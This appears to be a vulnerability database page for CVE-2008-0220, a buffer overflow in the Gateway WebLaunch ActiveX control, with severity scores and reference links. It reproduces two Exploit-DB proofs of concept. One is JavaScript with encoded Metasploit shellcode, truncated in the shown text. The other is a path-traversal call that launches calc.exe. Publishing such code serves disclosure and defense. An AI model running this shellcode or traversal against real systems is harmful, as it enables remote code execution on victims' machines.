CVE-2008-0220
published 2008-01-10CVE-2008-0220: Multiple stack-based buffer overflows in the WebLaunch.WeblaunchCtl.1 (aka CWebLaunchCtl) ActiveX control in weblaunch.ocx 1.0.0.1 in Gateway Weblaunch allow…
PriorityP344high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
15.66%
96.4th percentile
Multiple stack-based buffer overflows in the WebLaunch.WeblaunchCtl.1 (aka CWebLaunchCtl) ActiveX control in weblaunch.ocx 1.0.0.1 in Gateway Weblaunch allow remote attackers to execute arbitrary code via a long string in the (1) second or (2) fourth argument to the DoWebLaunch method. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gateway | cweblaunchctl_activex_control | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Gateway WebLaunch - ActiveX Remote Buffer Overflow
exploitdb·2008-01-25
CVE-2008-0220 Gateway WebLaunch - ActiveX Remote Buffer Overflow
Gateway WebLaunch - ActiveX Remote Buffer Overflow
---
Gateway WebLaunch Buffer Overflow Exploit
function Check() {
// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com
var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
"%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +
"%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +
"%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +
"%u6e75%u416b
Exploit-DB
Gateway Weblaunch - ActiveX Control Insecure Method
exploitdb·2008-01-08
CVE-2008-0221 Gateway Weblaunch - ActiveX Control Insecure Method
Gateway Weblaunch - ActiveX Control Insecure Method
---
Gateway Weblaunch ActiveX Control Insecure Method Exploit
function Check() {
//escape from systemdrive\documents and settings\username\local settings\temp
obj.DoWebLaunch("","..\\..\\..\\..\\windows\\system32\\calc.exe","","");
}
Unable to create object
# milw0rm.com [2008-01-08]
No writeups or analysis indexed.
http://marc.info/?l=full-disclosure&m=119984138526735&w=2http://secunia.com/advisories/28379http://www.kb.cert.org/vuls/id/735441http://www.securityfocus.com/bid/27193http://www.vupen.com/english/advisories/2008/0077https://www.exploit-db.com/exploits/4869https://www.exploit-db.com/exploits/4982http://marc.info/?l=full-disclosure&m=119984138526735&w=2http://secunia.com/advisories/28379http://www.kb.cert.org/vuls/id/735441http://www.securityfocus.com/bid/27193http://www.vupen.com/english/advisories/2008/0077https://www.exploit-db.com/exploits/4869https://www.exploit-db.com/exploits/4982
2008-01-10
Published